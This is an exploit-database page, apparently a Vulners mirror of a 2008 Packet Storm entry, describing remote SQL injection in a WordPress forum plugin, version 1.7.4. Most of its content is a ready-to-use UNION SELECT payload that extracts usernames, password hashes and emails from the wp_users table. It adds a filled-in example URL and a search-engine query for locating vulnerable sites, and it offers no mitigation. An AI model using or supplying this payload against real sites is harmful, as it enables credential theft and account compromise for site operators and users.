Lucene search
wpforum-sql.txt
๐๏ธย 22 Jan 2008ย 00:00:00Reported byย websec TeamTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 21ย Views
remote sql injection in WordPress forum plugin version 1.7.
Show more
` remote sql injection exploit
###############################################################
# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*
(wp_tbv_users)
# >>> google: Fredrik Fahlstad. Version: 1.7.4.
# >>> author websec Team ./members =====> Virus_C, Refresh , Virusa
# >>> page : hacking.ge
###############################################################
this is example
http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo22 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4